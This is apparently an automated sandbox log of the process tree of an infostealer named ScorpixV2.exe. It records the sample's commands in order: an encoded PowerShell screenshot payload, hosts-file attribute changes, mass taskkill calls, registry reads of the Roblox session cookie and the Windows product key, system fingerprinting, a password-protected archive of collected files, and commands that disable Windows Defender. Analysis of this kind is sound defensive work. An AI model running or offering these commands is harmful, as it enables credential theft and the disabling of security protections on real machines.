      C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="
      4⤵
      PID:5492
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=
        5⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:6104
      - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\sqlbbeh3\sqlbbeh3.cmdline"
        6⤵
        
        PID:5440
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES1671.tmp" "c:\Users\Admin\AppData\Local\Temp\sqlbbeh3\CSCB7CE07ABD2C54D87A1FE4DC76A25097.TMP"
        7⤵
        
        PID:5660
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "tree /A /F"
      4⤵
      PID:5860
    - - C:\Windows\system32\tree.com
        
        tree /A /F
        5⤵
        
        PID:5676
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "attrib -r C:\Windows\System32\drivers\etc\hosts"
      4⤵
      PID:6008
    - - C:\Windows\system32\attrib.exe
        
        attrib -r C:\Windows\System32\drivers\etc\hosts
        5⤵
        Drops file in Drivers directory
        Views/modifies file attributes
        
        PID:6092
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "tree /A /F"
      4⤵
      PID:5144
    - - C:\Windows\system32\tree.com
        
        tree /A /F
        5⤵
        
        PID:5256
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "attrib +r C:\Windows\System32\drivers\etc\hosts"
      4⤵
      PID:3460
    - - C:\Windows\system32\attrib.exe
        
        attrib +r C:\Windows\System32\drivers\etc\hosts
        5⤵
        Drops file in Drivers directory
        Views/modifies file attributes
        
        PID:6076
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "tree /A /F"
      4⤵
      PID:3688
    - - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        5⤵
        
        PID:5616
    - - C:\Windows\system32\tree.com
        
        tree /A /F
        5⤵
        
        PID:5524
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
      4⤵
      PID:5528
    - - C:\Windows\system32\tasklist.exe
        
        tasklist /FO LIST
        5⤵
        Enumerates processes with tasklist
        
        PID:3556
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "tree /A /F"
      4⤵
      PID:2772
    - - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        5⤵
        
        PID:5208
    - - C:\Windows\system32\tree.com
        
        tree /A /F
        5⤵
        
        PID:5880
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "tree /A /F"
      4⤵
      PID:3936
    - - C:\Windows\system32\tree.com
        
        tree /A /F
        5⤵
        
        PID:5932
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "taskkill /F /PID 3948"
      4⤵
      PID:5524
    - - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        5⤵
        
        PID:796
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /F /PID 3948
        5⤵
        Kills process with taskkill
        
        PID:5888
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "taskkill /F /PID 3028"
      4⤵
      PID:1264
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /F /PID 3028
        5⤵
        Kills process with taskkill
        
        PID:5612
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "taskkill /F /PID 3468"
      4⤵
      PID:1424
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /F /PID 3468
        5⤵
        Kills process with taskkill
        
        PID:4960
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "taskkill /F /PID 800"
      4⤵
      PID:5692
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /F /PID 800
        5⤵
        Kills process with taskkill
        
        PID:5848
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "taskkill /F /PID 3948"
      4⤵
      PID:1536
    - - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        5⤵
        
        PID:5320
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /F /PID 3948
        5⤵
        Kills process with taskkill
        
        PID:5828
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "taskkill /F /PID 4020"
      4⤵
      PID:5564
    - - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        5⤵
        
        PID:5676
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /F /PID 4020
        5⤵
        Kills process with taskkill
        
        PID:5224
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "taskkill /F /PID 3028"
      4⤵
      PID:5144
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /F /PID 3028
        5⤵
        Kills process with taskkill
        
        PID:3688
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "taskkill /F /PID 3496"
      4⤵
      PID:1352
    - - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        5⤵
        
        PID:5248
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /F /PID 3496
        5⤵
        Kills process with taskkill
        
        PID:5512
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "taskkill /F /PID 3468"
      4⤵
      PID:5440
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /F /PID 3468
        5⤵
        Kills process with taskkill
        
        PID:5384
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "taskkill /F /PID 1752"
      4⤵
      PID:5448
    - - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        5⤵
        
        PID:5244
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /F /PID 1752
        5⤵
        Kills process with taskkill
        
        PID:5884
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "taskkill /F /PID 800"
      4⤵
      PID:5256
    - - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        5⤵
        
        PID:4032
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /F /PID 800
        5⤵
        Kills process with taskkill
        
        PID:5776
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "taskkill /F /PID 4000"
      4⤵
      PID:5252
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /F /PID 4000
        5⤵
        Kills process with taskkill
        
        PID:3844
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "getmac"
      4⤵
      PID:3480
    - - C:\Windows\system32\getmac.exe
        
        getmac
        5⤵
        
        PID:6028
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "taskkill /F /PID 4020"
      4⤵
      PID:3152
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /F /PID 4020
        5⤵
        Kills process with taskkill
        
        PID:4564
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "taskkill /F /PID 2552"
      4⤵
      PID:396
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /F /PID 2552
        5⤵
        Kills process with taskkill
        
        PID:5584
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "taskkill /F /PID 3496"
      4⤵
      PID:2456
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /F /PID 3496
        5⤵
        Kills process with taskkill
        
        PID:5748
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "taskkill /F /PID 2180"
      4⤵
      PID:1264
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /F /PID 2180
        5⤵
        Kills process with taskkill
        
        PID:5476
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "taskkill /F /PID 1752"
      4⤵
      PID:5964
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /F /PID 1752
        5⤵
        Kills process with taskkill
        
        PID:5424
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "taskkill /F /PID 4000"
      4⤵
      PID:5216
    - - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        5⤵
        
        PID:4960
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /F /PID 4000
        5⤵
        Kills process with taskkill
        
        PID:4392
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "taskkill /F /PID 2552"
      4⤵
      PID:5444
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /F /PID 2552
        5⤵
        Kills process with taskkill
        
        PID:5568
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "taskkill /F /PID 2180"
      4⤵
      PID:312
    - - C:\Windows\system32\taskkill.exe
        
        taskkill /F /PID 2180
        5⤵
        Kills process with taskkill
        
        PID:5920
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
      4⤵
      PID:5504
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:6120
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
      4⤵
      PID:5604
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        5⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:5292
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\_MEI19002\rar.exe a -r -hp"yelex123" "C:\Users\Admin\AppData\Local\Temp\yJ5yN.zip" *"
      4⤵
      PID:2272
    - - C:\Users\Admin\AppData\Local\Temp\_MEI19002\rar.exe
        
        C:\Users\Admin\AppData\Local\Temp\_MEI19002\rar.exe a -r -hp"yelex123" "C:\Users\Admin\AppData\Local\Temp\yJ5yN.zip" *
        5⤵
        Executes dropped EXE
        
        PID:6080
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "wmic os get Caption"
      4⤵
      PID:5148
    - - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        5⤵
        
        PID:5820
    - - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic os get Caption
        5⤵
        
        PID:2456
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"
      4⤵
      PID:5396
    - - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        5⤵
        
        PID:3480
    - - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic computersystem get totalphysicalmemory
        5⤵
        
        PID:5456
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
      4⤵
      PID:3352
    - - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic csproduct get uuid
        5⤵
        
        PID:6012
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"
      4⤵
      PID:3752
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:2280
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
      4⤵
      PID:5032
    - - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        5⤵
        
        PID:6076
    - - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic path win32_VideoController get name
        5⤵
        Detects videocard installed
        
        PID:5652
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"
      4⤵
      PID:2388
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
        5⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:3804
- C:\Users\Admin\Downloads\ScorpixV2.exe
  "C:\Users\Admin\Downloads\ScorpixV2.exe"
  2⤵
  - Executes dropped EXE
  PID:5408
- - C:\Users\Admin\Downloads\ScorpixV2.exe
    "C:\Users\Admin\Downloads\ScorpixV2.exe"
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    PID:5808
- C:\Users\Admin\Downloads\ScorpixV2.exe
  "C:\Users\Admin\Downloads\ScorpixV2.exe"
  2⤵
  - Executes dropped EXE
  PID:5952
- - C:\Users\Admin\Downloads\ScorpixV2.exe
    "C:\Users\Admin\Downloads\ScorpixV2.exe"
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    PID:6080

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:4660

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:3744

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:4796

C:\Users\Admin\Downloads\ScorpixV2.exe
"C:\Users\Admin\Downloads\ScorpixV2.exe"
1⤵
- Executes dropped EXE
PID:6024
- C:\Users\Admin\Downloads\ScorpixV2.exe
  "C:\Users\Admin\Downloads\ScorpixV2.exe"
  2⤵
  - Drops file in Drivers directory
  - Executes dropped EXE
  PID:4960
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\Downloads\ScorpixV2.exe'"
    3⤵
    PID:5688
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\Downloads\ScorpixV2.exe'
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      PID:1944
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
    3⤵
    PID:1776
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
      4⤵
